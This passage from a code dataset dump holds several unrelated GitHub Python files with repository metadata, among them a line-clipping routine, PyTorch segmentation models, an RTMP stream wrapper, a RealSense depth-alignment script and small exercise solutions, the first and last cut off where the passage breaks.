Baixo\non_border_enum = [0, 1, 2, 3, 4, 5, 6, 7]\n\nx_esquerda = canvas[0][0]\nx_direita = canvas[1][0]\ny_topo = canvas[2][1]\ny_fundo = canvas[0][1]\n\ndef clipObject(obj_name: str, normalized_coordinates: list) -> None:\n objectManager.display_file[obj_name].setNormalizedCoordinates(normalized_coordinates)\n region_codes = calculateRegionCodes(normalized_coordinates)\n\n to_draw_coordinates = list()\n on_border_list = list()\n on_line_list = list()\n\n looprange = range(len(normalized_coordinates))\n if objectManager.display_file[obj_name].is_bezier or objectManager.display_file[obj_name].is_bspline:\n looprange = looprange[:len(looprange)-1]\n for index in looprange:\n index0 = index\n index1 = index + 1\n\n if index1 == len(normalized_coordinates):\n index1 = 0\n\n region_code0 = region_codes[index0]\n region_code1 = region_codes[index1]\n\n # 0 = Totally Visible; 1 = Not Visible; 2 = Partially Visible\n line_visibility = 0\n if region_code0 == inside_window_code and region_code1 == inside_window_code:\n line_visibility = 0\n elif [region_code0[i] and region_code1[i] for i in range(len(region_code0))] != inside_window_code:\n line_visibility = 1\n else:\n line_visibility = 2\n\n norm_coord0 = normalized_coordinates[index0]\n norm_coord1 = normalized_coordinates[index1]\n\n if line_visibility == 0:\n to_draw_coordinates.append(norm_coord0)\n to_draw_coordinates.append(norm_coord1)\n on_border_list += [-1, -1]\n\n on_line_list += [[index0, index1], [index0, index1]]\n elif line_visibility == 2:\n line_declive = (norm_coord1[1] - norm_coord0[1]) / (norm_coord1[0] - norm_coord0[0]) # (y2 - y1) / (x2 - x1)\n\n result0 = calculateIntersection(norm_coord0, region_code0, line_declive)\n to_draw_coord0 = result0['coord']\n border0 = result0['border']\n\n # Interseccão é fora da window, não é necessário calcular x2 - se uma interseccão for fora a outra também será\n if to_draw_coord0[0] < x_esquerda or to_draw_coord0[0] > x_direita or to_draw_coord0[1] < y_fundo or to_draw_coord0[1] > y_topo:\n continue\n\n result1 = calculateIntersection(norm_coord1, region_code1, line_declive)\n to_draw_coord1 = result1['coord']\n border1 = result1['border']\n\n to_draw_coordinates.append(to_draw_coord0)\n to_draw_coordinates.append(to_draw_coord1)\n\n on_border_list.append(border0)\n on_border_list.append(border1)\n\n on_line_list += [[index0, index1], [index0, index1]]\n\n objectManager.display_file[obj_name].setToDrawnCoordinates(to_draw_coordinates)\n objectManager.display_file[obj_name].setOnBorderList(on_border_list)\n objectManager.display_file[obj_name].setOnLineList(on_line_list)\n\ndef calculateIntersection(coord: list, region_code: list, line_declive: float) -> dict:\n if region_code == inside_window_code:\n return {'coord': coord, 'border': -1}\n\n # -1 = Dentro, 0 = Acima, 1 = Abaixo, 2 = Direita, 3 = Esquerda, 4 = Esq. Topo, 5 = Dir. Topo, 6 = Dir. Baixo, 7 = Esq. 
Baixo\n border = -1\n\n x = 0\n y = 0\n\n # Topo\n if region_code[0]:\n x = coord[0] + ((1 / line_declive) * (y_topo - coord[1]))\n\n # Esquerda Topo\n if region_code[3]:\n y = coord[1] + (line_declive * (x_esquerda - coord[0]))\n\n if x < x_esquerda and y <= y_topo:\n border = 3\n x = x_esquerda\n elif y > y_topo and x >= x_esquerda:\n border = 0\n y = y_topo\n else:\n border = 4\n\n # Direita Topo\n elif region_code[2]:\n y = coord[1] + (line_declive * (x_direita - coord[0]))\n\n if x > x_direita and y <= y_topo:\n border = 2\n x = x_direita\n if y > y_topo and x <= x_direita:\n border = 0\n y = y_topo\n else:\n border = 5\n else:\n border = 0\n y = y_topo\n\n # Fundo\n elif region_code[1]:\n x = coord[0] + ((1 / line_declive) * (y_fundo - coord[1]))\n\n # Esquerda Baixo\n if region_code[3]:\n y = coord[1] + (line_declive * (x_esquerda - coord[0]))\n\n if x < x_esquerda and y >= y_fundo:\n border = 3\n x = x_esquerda\n elif y < y_fundo and x >= x_esquerda:\n border = 1\n y = y_fundo\n else:\n border = 7\n\n # Direita Baixo\n elif region_code[2]:\n y = coord[1] + (line_declive * (x_direita - coord[0]))\n\n if x > x_direita and y >= y_fundo:\n border = 2\n x = x_direita\n if y < y_fundo and x <= x_direita:\n border = 1\n y = y_fundo\n else:\n border = 6\n else:\n border = 1\n y = y_fundo\n\n # Direita\n elif region_code[2]:\n border = 2\n x = x_direita\n y = coord[1] + (line_declive * (x_direita - coord[0]))\n\n # Esquerda\n elif region_code[3]:\n border = 3\n x = x_esquerda\n y = coord[1] + (line_declive * (x_esquerda - coord[0]))\n\n return {'coord': [x, y], 'border': border}\n\ndef calculateRegionCodes(normalized_coordinates: list) -> list:\n region_codes = list()\n for index in range(len(normalized_coordinates)):\n region_code = list()\n dot = normalized_coordinates[index]\n x = dot[0]\n y = dot[1]\n\n if y > canvas[2][1]: # Yi > Ywtopo ?\n region_code.append(1)\n else:\n region_code.append(0)\n\n if y < canvas[0][1]: # Yi < Ywfundo ?\n region_code.append(1)\n else:\n region_code.append(0)\n\n if x > canvas[1][0]: # Xi > Xwdir ?\n region_code.append(1)\n else:\n region_code.append(0)\n\n if x < canvas[0][0]: # Xi < Xwesq ?\n region_code.append(1)\n else:\n region_code.append(0)\n\n region_codes.append(region_code)\n return region_codes","repo_name":"DavidGrunheidt/Graphic-System","sub_path":"clipper.py","file_name":"clipper.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2465862404","text":"from .segments import InitConv, ConvDown, DeconvUp, FinalConv, AdditionalLayers, InceptionModule, ConvInception, FirstUpscaling, Upscaling, Final\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass SkinnyInception(nn.Module):\n \"\"\"\n Skinny architecture variant with inception modules.\n \"\"\"\n\n def __init__(self, n_channels: int, n_classes: int):\n super(SkinnyInception, self).__init__()\n\n self.n_channels = n_channels\n self.n_classes = n_classes\n\n self.down1 = (ConvInception(self.n_channels, 20))\n self.down2 = (ConvInception(20, 40))\n self.down3 = (ConvInception(40, 80))\n self.down4 = (ConvInception(80, 160))\n self.down5 = (ConvInception(160, 320))\n\n self.up1 = (FirstUpscaling(320))\n self.up2 = (Upscaling(640))\n self.up3 = (Upscaling(320))\n self.up4 = (Upscaling(160))\n self.up5 = (Upscaling(80))\n\n self.final = (Final(40, self.n_classes))\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n # x2-x6 receive max-pooled inputs\n x1 = 
self.down1(x)\n x2 = self.down2(F.max_pool2d(x1, 2))\n x3 = self.down3(F.max_pool2d(x2, 2))\n x4 = self.down4(F.max_pool2d(x3, 2))\n x5 = self.down5(F.max_pool2d(x4, 2))\n\n x6 = self.up1(F.max_pool2d(x5, 2), x5)\n x6 = self.up2(x6, x4)\n x6 = self.up3(x6, x3)\n x6 = self.up4(x6, x2)\n x6 = self.up5(x6, x1)\n\n x6 = self.final(x6)\n\n return x6\n\n\nclass SkinnyBasic(nn.Module):\n \"\"\"\n Skinny architecture variant without inception modules.\n \"\"\"\n\n def __init__(self, n_channels: int, n_classes: int):\n super(SkinnyBasic, self).__init__()\n\n self.n_channels = n_channels\n self.n_classes = n_classes\n\n self.init = (InitConv(self.n_channels, 15))\n\n self.conv_down1 = (ConvDown(15, 30))\n self.conv_down2 = (ConvDown(30, 60))\n self.conv_down3 = (ConvDown(60, 120))\n self.conv_down4 = (ConvDown(120, 240))\n\n self.additional = (AdditionalLayers())\n\n self.deconv_up1 = (DeconvUp(240, 480))\n self.deconv_up2 = (DeconvUp(480, 240))\n self.deconv_up3 = (DeconvUp(240, 120))\n self.deconv_up4 = (DeconvUp(120, 60))\n self.deconv_up5 = (DeconvUp(60, 30))\n\n self.final = (FinalConv(30, n_classes))\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x1 = self.init(x)\n x2 = self.conv_down1(x1)\n x3 = self.conv_down2(x2)\n x4 = self.conv_down3(x3)\n x5 = self.conv_down4(x4)\n x6 = self.additional(x5)\n\n x7 = self.deconv_up1(x6, x5)\n x8 = self.deconv_up2(x7, x4)\n x9 = self.deconv_up3(x8, x3)\n x10 = self.deconv_up4(x9, x2)\n x11 = self.deconv_up5(x10, x1)\n\n output = self.final(x11)\n\n return output\n","repo_name":"Maugosia/hand-segmentation-nn","sub_path":"skinny/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35426843965","text":"import sqlite3\nfrom bs4 import BeautifulSoup\n\ncon = sqlite3.connect(\"words.db\")\n\ncur = con.cursor()\n\n\ndef define_sql():\n # Create table\n con.execute(\n '''\n CREATE TABLE IF NOT EXISTS words(\n id integer primary key AUTOINCREMENT, word varchar(255), word_length integer,\n UNIQUE(word)\n );\n '''\n )\n\n # Create Secondary Index\n con.execute(\n '''\n CREATE INDEX IF NOT EXISTS word_length ON words(word_length)\n '''\n )\n\n\ndef insert_word(word: str, word_length: int):\n try:\n con.execute(\n f'''\n INSERT INTO words(word, word_length) VALUES(?, ?);\n ''', (word.lower(), word_length)\n )\n except:\n print(f\"Some Error while inserting: {word}\")\n\n\ndefine_sql()\n\n\ndef scrap_file(file):\n soup = BeautifulSoup(file, features='lxml')\n\n dup_check = []\n\n for line in soup.find_all('p'):\n for word in line.find_next('b'):\n\n if word.__contains__(\"'\") or word.__contains__('-') or word.__contains__(' '):\n continue\n\n if len(dup_check) == 0:\n dup_check.append(word)\n else:\n if word == dup_check[0]:\n continue\n else:\n dup_check.pop()\n dup_check.append(word)\n print(\"Inserting {}\".format(word))\n insert_word(word, len(word))\n\n file.close()\n\n\ndef scrap_word():\n for alp in range(ord('a'), ord('z') + 1):\n file = open(f\"words/{chr(alp)}.html\", mode='r')\n scrap_file(file)\n file.close()\n file = open('words/new.html', mode='r')\n scrap_file(file)\n file.close()\n\n\nscrap_word()\n\ncon.commit()\ncon.close()","repo_name":"abughalib/wordle_solver","sub_path":"populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2374816703","text":"from io import 
IOBase\n\nfrom . import ffi, librtmp\nfrom .compat import byte_types\nfrom .exceptions import RTMPError\n\n__all__ = [\"RTMPStream\"]\n\n\nclass RTMPStream(IOBase):\n \"\"\"A file-like interface to a stream within\n a RTMP session.\"\"\"\n\n def __init__(self, client, update_buffer=True):\n self.client = client\n self._buf = self._view = None\n self._closed = False\n self._update_buffer = update_buffer\n self._updated_buffer = False\n\n def read(self, size):\n \"\"\"Attempts to read data from the stream.\n\n :param size: int, The maximum amount of bytes to read.\n\n Raises :exc:`IOError` on error.\n \"\"\"\n # If enabled tell the server that our buffer can fit the whole\n # stream, this often increases throughput alot.\n if self._update_buffer and not self._updated_buffer and self.duration:\n self.update_buffer((self.duration * 1000) + 5000)\n self._updated_buffer = True\n\n if not self._buf or len(self._buf) != size:\n self._buf = ffi.new(\"char[]\", size)\n self._view = ffi.buffer(self._buf, size)\n\n res = librtmp.RTMP_Read(self.client.rtmp, self._buf, size)\n\n if res < 0:\n raise IOError(\"Failed to read data\")\n\n return self._view[:res]\n\n def write(self, data):\n \"\"\"Writes data to the stream.\n\n :param data: bytes, FLV data to write to the stream\n\n The data passed can contain multiple FLV tags, but it MUST\n always contain complete tags or undefined behaviour might\n occur.\n\n Raises :exc:`IOError` on error.\n \"\"\"\n if isinstance(data, bytearray):\n data = bytes(data)\n\n if not isinstance(data, byte_types):\n raise ValueError(\"A bytes argument is required\")\n\n res = librtmp.RTMP_Write(self.client.rtmp, data, len(data))\n\n if res < 0:\n raise IOError(\"Failed to write data\")\n\n return res\n\n def pause(self):\n \"\"\"Pauses the stream.\"\"\"\n res = librtmp.RTMP_Pause(self.client.rtmp, 1)\n\n if res < 1:\n raise RTMPError(\"Failed to pause\")\n\n def unpause(self):\n \"\"\"Unpauses the stream.\"\"\"\n res = librtmp.RTMP_Pause(self.client.rtmp, 0)\n\n if res < 1:\n raise RTMPError(\"Failed to unpause\")\n\n def seek(self, time):\n \"\"\"Attempts to seek in the stream.\n\n :param time: int, Time to seek to in seconds\n\n \"\"\"\n res = librtmp.RTMP_SendSeek(self.client.rtmp, time)\n\n if res < 1:\n raise RTMPError(\"Failed to seek\")\n\n def close(self):\n \"\"\"Closes the connection.\"\"\"\n if not self._closed:\n self._closed = True\n self.client.close()\n\n def update_buffer(self, ms):\n \"\"\"Tells the server how big our buffer is (in milliseconds).\"\"\"\n librtmp.RTMP_SetBufferMS(self.client.rtmp, int(ms))\n librtmp.RTMP_UpdateBufferMS(self.client.rtmp)\n\n @property\n def duration(self):\n \"\"\"The duration of the stream.\"\"\"\n return librtmp.RTMP_GetDuration(self.client.rtmp)\n","repo_name":"chrippa/python-librtmp","sub_path":"librtmp/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"51"} +{"seq_id":"3244700713","text":"from genesis.tools import lextagger as LT\n\n\nsentence = \"I like oranges and apples\"\n\n# run the spacy nlp module\nsyntax_parsed = LT.nlp(sentence)\n\nfor token in syntax_parsed:\n print(token, token.pos_, token.dep_, LT.deep_syntax(token))\n\nprint(\"+++++\")\n\nfor token in syntax_parsed:\n print(token, LT.lookup_all(token))\n\n# lookup like independently\nlexicon_like, ontology_like = LT.lookup_all(syntax_parsed[1])\n\n# lets take the second returned entry from the lexicon lookup\nwlike = lexicon_like[1]\n\n# or 
the first ontology lookup\nscore, wlike = ontology_like[0]\n\n\nprint(\"+++++\")\nprint(wlike.wclass.onttype)\n\n# you should really just explore from here\n","repo_name":"tripslab/vagrant-trips","sub_path":"shared/examples/lookup_words.py","file_name":"lookup_words.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"38158859083","text":"import cv2 # state of the art computer vision algorithms library\r\nimport numpy as np # fundamental package for scientific computing\r\nimport matplotlib.pyplot as plt # 2D plotting library producing publication quality figures\r\nimport pyrealsense2 as rs # Intel RealSense cross-platform open-source API\r\nimport os\r\n\r\n\r\ndef depth2hue(depth_arr):\r\n d_min = 600\r\n d_max = 10000\r\n [rows, cols] = depth_arr.shape\r\n hue_image = np.zeros([rows, cols, 3])\r\n for i in range(0, rows):\r\n for j in range(0, cols):\r\n d = depth_arr[i, j]\r\n if d < d_min or d > d_max:\r\n hue_image[i, j, :] = 0\r\n else:\r\n d_normal = 1529 * (d - d_min) / (d_max - d_min)\r\n # print(d_normal)\r\n # pr\r\n if (0 <= d_normal <= 255) or (1257 < d_normal <= 1529):\r\n hue_image[i, j, 0] = 255\r\n elif 255 < d_normal <= 510:\r\n hue_image[i, j, 0] = 510 - d_normal\r\n elif 510 < d_normal <= 1020:\r\n hue_image[i, j, 0] = 0\r\n elif 1020 < d_normal <= 1275:\r\n hue_image[i, j, 0] = d_normal - 1020\r\n # pg\r\n if 0 < d_normal <= 255:\r\n hue_image[i, j, 1] = d_normal\r\n elif 255 < d_normal <= 510:\r\n hue_image[i, j, 1] = 255\r\n elif 510 < d_normal <= 765:\r\n hue_image[i, j, 1] = 255\r\n elif 765 < d_normal <= 1020:\r\n hue_image[i, j, 1] = 1020 - d_normal\r\n elif 1020 < d_normal <= 1529:\r\n hue_image[i, j, 1] = 0\r\n # pb\r\n if 0 < d_normal <= 510:\r\n hue_image[i, j, 2] = 0\r\n elif 510 < d_normal <= 765:\r\n hue_image[i, j, 2] = d_normal - 510\r\n elif 765 < d_normal <= 1020:\r\n hue_image[i, j, 2] = 255\r\n elif 1020 < d_normal <= 1275:\r\n hue_image[i, j, 2] = 255\r\n elif 1275 < d_normal <= 1529:\r\n hue_image[i, j, 2] = 1530 - d_normal\r\n hue_image = np.array(hue_image, dtype='uint8')\r\n return hue_image\r\n\r\n\r\ndef depth_normalization(depth_arr):\r\n d_min = 600\r\n d_max = 10000\r\n [rows, cols] = depth_arr.shape\r\n for i in range(0, rows):\r\n for j in range(0, cols):\r\n d = depth_arr[i, j]\r\n if d < d_min or d > d_max:\r\n depth_arr[i, j] = 0\r\n depth_arr = np.array(depth_arr, dtype='uint16')\r\n return depth_arr\r\n\r\n\r\nprint(\"Environment Ready\")\r\n# File names and paths initialization\r\nframe_number = 900\r\nimage_number = \"19\"\r\nbag_filename = \"20200707_160533\"\r\n\r\nbasic_name = bag_filename+'_'+image_number\r\nbag_basepath = r\"F:\\Uob Dissertation Dataset\\rosbag files\"\r\nbag_dir = os.path.join(bag_basepath, bag_filename+'.bag')\r\nsavepath_root = r\"F:\\Uob Dissertation Dataset\\Aligned footpath dataset_new\"\r\nsavepath = os.path.join(savepath_root, bag_filename)\r\n\r\n# Setup:\r\npipe = rs.pipeline()\r\ncfg = rs.config()\r\ncfg.enable_device_from_file(bag_dir)\r\nprofile = pipe.start(cfg)\r\n\r\n# Skip 5 first frames to give the Auto-Exposure time to adjust\r\nfor x in range(frame_number):\r\n pipe.wait_for_frames()\r\n\r\n# Store next frameset for later processing:\r\nframeset = pipe.wait_for_frames()\r\ncolor_frame = frameset.get_color_frame()\r\ndepth_frame = frameset.get_depth_frame()\r\n\r\n# Cleanup:\r\npipe.stop()\r\nprint(\"Frames Captured\")\r\n\r\n# Original color frame\r\ncolor = 
np.asanyarray(color_frame.get_data())\r\nplt.rcParams[\"axes.grid\"] = False\r\nplt.rcParams['figure.figsize'] = [12, 6]\r\nplt.imshow(color)\r\n# plt.show()\r\n\r\n# Original colirized depth frame\r\ncolorized_depth_arr = np.asanyarray(depth_frame.get_data())\r\ncolorized_depth = depth2hue(colorized_depth_arr)\r\nplt.imshow(colorized_depth)\r\n# plt.show()\r\nimages = np.hstack((color, colorized_depth))\r\nplt.imshow(images)\r\nplt.show()\r\n\r\n# Create alignment primitive with color as its target stream:\r\nalign = rs.align(rs.stream.color)\r\nframeset = align.process(frameset)\r\n\r\n# Update color and depth frames:\r\naligned_depth_frame = frameset.get_depth_frame()\r\naligned_depth = np.asanyarray(aligned_depth_frame.get_data())\r\naligned_depth = depth_normalization(aligned_depth)\r\n# print(aligned_depth)\r\n# print(aligned_depth.shape)\r\n# Save the normalized depth data as npy\r\ndepth_filename = basic_name+'_depth.npy'\r\ntemp_dir = os.path.join(savepath, depth_filename)\r\n# np.save(temp_dir, aligned_depth)\r\n\r\n# colorized_depth_arr = np.asanyarray(aligned_depth_frame.get_data())\r\ncolorized_depth = depth2hue(aligned_depth)\r\n\r\n# Show the two frames together:\r\nimages = np.hstack((color, colorized_depth))\r\nplt.imshow(images)\r\nplt.show()\r\n\r\n# plt.imshow(color)\r\n# plt.show()\r\ncolor_bgr = cv2.cvtColor(color, cv2.COLOR_RGB2BGR)\r\ntemp_dir = os.path.join(savepath, basic_name+'_color.png')\r\n# cv2.imwrite(temp_dir, color_bgr)\r\n\r\n# plt.imshow(colorized_depth)\r\n# plt.show()\r\ncolorized_depth_bgr = cv2.cvtColor(colorized_depth, cv2.COLOR_RGB2BGR)\r\ntemp_dir = os.path.join(savepath, basic_name+'_depth_visualization.png')\r\n# cv2.imwrite(temp_dir, colorized_depth_bgr)\r\n\r\n","repo_name":"luoyizhi516/Mask-R-CNN-for-Footpath-Detection","sub_path":"rgb-depth alignment 2.0.py","file_name":"rgb-depth alignment 2.0.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33636684214","text":"import sys\nsys.stdin = open(\"C:/Users/현대오토13/Desktop/수진_개인파일/파이썬/input.txt\",\"r\")\nn=int(input())\nm=int(input())\nxs = list(map(int,input().split()))\n\nmax_v = 0\nfor i in range(m):\n if i == 0:\n max_v = xs[i] - 0\n \n if i == m-1:\n max_v = max(max_v,n-xs[m-1])\n\n if m>1 and i>0: #가로등이 2개이상이고, 2번째 가로등일 때,\n if (xs[i] - xs[i-1]) % 2 == 0:\n tmp=(xs[i] - xs[i-1]) // 2\n elif (xs[i] - xs[i-1]) % 2 != 0:\n tmp=(xs[i] - xs[i-1]) // 2 + 1\n\n max_v = max(max_v,tmp)\n \n\nprint(max_v)","repo_name":"sujinH/python_bj","sub_path":"17266_1.py","file_name":"17266_1.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5609827007","text":"class BrowserHistory:\n\n def __init__(self, homepage: str):\n self.head = Node(homepage)\n self.curr = self.head\n \n def visit(self, url: str) -> None:\n new_node = Node(url)\n new_node.prev = self.curr\n self.curr.next = new_node\n self.curr = new_node\n \n \n def back(self, steps: int) -> str:\n i = 0\n while i < steps and self.curr.prev:\n self.curr = self.curr.prev\n i += 1\n return self.curr.val\n\n def forward(self, steps: int) -> str:\n i = 0\n while i < steps and self.curr.next:\n self.curr = self.curr.next\n i += 1\n return self.curr.val\n \nclass Node:\n def __init__(self,val):\n self.val = val\n self.next = None\n self.prev = None\n\n# Your BrowserHistory object will be instantiated and called as such:\n# obj = 
BrowserHistory(homepage)\n# obj.visit(url)\n# param_2 = obj.back(steps)\n# param_3 = obj.forward(steps)","repo_name":"EyasuTesfu/Competitive-Programming","sub_path":"1472-design-browser-history/1472-design-browser-history.py","file_name":"1472-design-browser-history.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3244488651","text":"atiradores = []\nnomes = []\ndistancias = []\nsexos = []\nacertou_M = []\ndistancias_F = []\n\n# quantidade de participantes, nome, sexo, distância\nquantidade = int(input('Digite aqui a quantidade de participantes: '))\n\nwhile quantidade > 0:\n nome = input('Digite aqui o nome do policial: ')\n nomes.append(nome)\n sexo = input('Digite aqui o sexo do policial[M/F]: ')\n sexos.append(sexo)\n distancia = float(input('Digite aqui a distância(em centímetros) em relação ao alvo: '))\n distancias.append(distancia)\n if distancia < 1:\n atiradores.append(distancia)\n if sexo in 'Ff':\n distancias_F.append(distancia)\n if sexo in 'Mm':\n if distancia == 0:\n acertou_M.append(distancia)\n\n quantidade -= 1\n\n# melhor atirador/pior atirador\nmelhor = min(distancias)\nauxiliar_1 = distancias.index(melhor)\npolicial_1 = nomes[auxiliar_1]\nsexo_1 = sexos[auxiliar_1]\n\npior = max(distancias)\nauxiliar_2 = distancias.index(pior)\npolicial_2 = nomes[auxiliar_2]\nsexo_2 = sexos[auxiliar_2]\n\n\n\nprint(f'O percentual de policiais que alcançaram o título de atiradores de elite foi de {(len(atiradores) / len(nomes))*100 :.2f}%')\nprint(f'O melhor atirador foi {policial_1}, do sexo {sexo_1}, com a distância de {melhor} em relação ao alvo')\nprint(f'O pior atirador foi {policial_2}, do sexo {sexo_2}, com a distância de {pior} em relação ao alvo')\nprint(f'A quantidade de homens que acertou o alvo foi de {len(acertou_M)}')\nif len(distancias_F) != 0:\n print(f'A média da distância ao alvo obtida pelas atiradoras foi de {sum(distancias_F)/len(distancias_F)}')\n","repo_name":"AndradeLaryssa/Python","sub_path":"Atiradores.py","file_name":"Atiradores.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5431614575","text":"import pandas as pd\r\nimport numpy as np\r\n\r\nID10x = pd.read_csv(\"./B10x/B10x_sequences.csv\")\r\nbarcode = pd.read_csv(\"./B10x/B10x_sequences_with_barcodes_UMI.csv\", index_col=0)\r\n\r\nID10x = ID10x.rename(columns={\"Unnamed: 0\":\"10x_ID\"})\r\n\r\nprint(ID10x.dtypes)\r\nprint(barcode.dtypes)\r\n\r\ncomplete = pd.merge(ID10x, barcode, left_on=[\"alpha\", \"beta\", \"peptide\", \"mhc\"], right_on=[\"alpha\", \"beta\", \"peptide\", \"mhc\"])\r\n\r\nprint(complete)\r\nprint(np.shape(ID10x), np.shape(barcode))\r\n\r\ncomplete.to_csv(\"./B10x/B10x_all_sequences_with_10xID_barcode_binding_UMI.csv\")\r\n","repo_name":"mm523/TCR-structure-binding-prediction","sub_path":"prepare_fasta_files/10x_barcodes_to_ID.py","file_name":"10x_barcodes_to_ID.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5773793339","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom copy import deepcopy, copy\r\nOPERATORS={\"+\":lambda x, y: x+y, \"-\":lambda x, y: x-y, \"*\":lambda x, y: x*y, \"/\":lambda x, y: x/y, \"**\":lambda x, y: x**y}\r\nLIST_LIMIT=256\r\nNatural=(0, float(\"inf\"), 1, False)\r\nInteger=(float(\"-inf\"), float(\"inf\"), 1, 
False)\r\nReal=(float(\"-inf\"), float(\"inf\"), 0, False)\r\nComplex=(float(\"-inf\"), float(\"inf\"), 0, True)\r\n\r\ndef compile_text(func=None):\r\n if func==None:\r\n return []\r\n i, res=0, []\r\n while i1 and type(res[-2])==int and res[-1] not in list(\"+-*/\")+[\"**\"]:\r\n res.insert(-1, \"*\")\r\n i+=1\r\n return res\r\n\r\ndef get(self, args=(), edit=False, kwargs={}):\r\n if type(type(self.func[0]))==type(type(self)):\r\n return [calculate(self, f.func, [args, kwargs]) for f in self.func if type(type(f))==type(type(self))]\r\n if len(args)>0 and type(args[0])==dict:\r\n kwargs, args=args[0], ()\r\n if edit:\r\n calculate(self, self.func, [args, kwargs])\r\n else:\r\n return calculate(self, deepcopy(self.func), [args, kwargs])\r\n\r\ndef calculate(self, func, args):\r\n if type(func)!=list:\r\n return func\r\n i, args, arg_cash=0, args[0], args[1]\r\n for n in [i for i in range(len(func)) if (type(func[i])==str and func[i] not in OPERATORS) or type(func[i])==list]:\r\n if type(func[n])==list:\r\n func[n]=calculate(self, func[n], [args[i:], arg_cash])\r\n elif func[n] in arg_cash:\r\n func[n]=arg_cash[func[n]]\r\n elif iv[1]: raise TypeError(f\"argument more than {v[1]} in function {self}\")\r\n if v[2]>0 and (arg_cash[k]*(v[2]**-1)%1): raise TypeError(f\"argument is not correct: minimum step is {v[2]} in function {self}\")\r\n \r\n if True in [((type(f)==str and f not in OPERATORS) or type(f)==list) for f in func]:\r\n return func\r\n else:\r\n arg, func=func[0], func[1:]\r\n for o, n in zip(func[::2], func[1::2]):\r\n arg=OPERATORS[o](arg, n)\r\n return arg\r\n \r\n\r\ndef show(self, start=0, stop=10):\r\n fig, ax = plt.subplots(figsize=(5, 5), layout='constrained')\r\n x=list(to_list(self, max=100))\r\n ax.plot(np.linspace(-10, 10, len(x)), x, label=f'y=f(x)')\r\n ax.set_xlabel(\"x\")\r\n ax.set_ylabel('y')\r\n ax.set_title(\"Function\")\r\n ax.legend()\r\n plt.show()\r\n\r\ndef to_list(self, start=None, stop=None, step=None, max=LIST_LIMIT):\r\n start, stop, step=-max**(1/2) if start==None else start, max**(1/2) if stop==None else stop, max**(-1/2)*2 if step==None else step\r\n for k, v in self.type.items():\r\n if k in self.func:\r\n start=v[0] if startv[1] else stop\r\n step=v[2] if stepLIST_LIMIT: raise TypeError(f\"list biggest than {LIST_LIMIT}\")\r\n l=np.linspace(start, stop, int((stop-start)/step)+1)\r\n for l1 in l:\r\n c=calculate(self, deepcopy(self.func), [[l1], {}])\r\n if type(c)!=list:\r\n yield c\r\n else:\r\n yield np.array(list(type(self)(c, self.type)), dtype=float)\r\n\r\ndef __add__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"+\", f1.func] if type(f1)==type(f) else [\"+\", f1]\r\n else:\r\n self.func+=[\"+\", num.func] if type(num)==type(self) else [\"+\", num]\r\n return self\r\ndef __sub__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"-\", f1.func] if type(f1)==type(f) else [\"-\", f1]\r\n else:\r\n self.func+=[\"-\", num.func] if type(num)==type(self) else [\"-\", num]\r\n return self\r\ndef __mul__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"*\", f1.func] if type(f1)==type(f) else [\"*\", f1]\r\n else:\r\n self.func+=[\"*\", num.func] if type(num)==type(self) else [\"*\", num]\r\n return self\r\ndef __truediv__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n 
f.func+=[\"/\", f1.func] if type(f1)==type(f) else [\"/\", f1]\r\n else:\r\n self.func+=[\"/\", num.func] if type(num)==type(self) else [\"/\", num]\r\n return self\r\ndef __pow__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"**\", f1.func] if type(f1)==type(f) else [\"**\", f1]\r\n else:\r\n self.func+=[\"**\", num.func] if type(num)==type(self) else [\"**\", num]\r\n return self\r\ndef __neg__(self):\r\n self.func+=[\"*\", -1]\r\n return self\r\n\r\n\r\n\r\ndef calc_str(_list):\r\n res=\"\"\r\n for i in _list:\r\n if type(i)==list:\r\n res+=\"(\"+str(calc_str(i))+\")\"\r\n else:\r\n res+=str(i)\r\n return res\r\n\r\ndef to_str(self):\r\n if type(type(self.func[0]))==type(type(self)):\r\n res=\"(\"+str([f.__str__() for f in self.func if type(type(f))==type(type(self))]).replace(\"'\", \"\")[1:-1]+\")\"\r\n else:\r\n res=calc_str(self.func)\r\n if type(get(self))!=list:\r\n return str(get(self))\r\n for k, v in self.type.items():\r\n res+=\"\\n\"+(str(v[0])+'<=' if v[0]!=float('-inf') else '')+(k)+('<='+str(v[1]) if v[1]!=float('inf') else '')+(' step='+str(v[2]) if v[2]!=0 else '')+(' complex' if 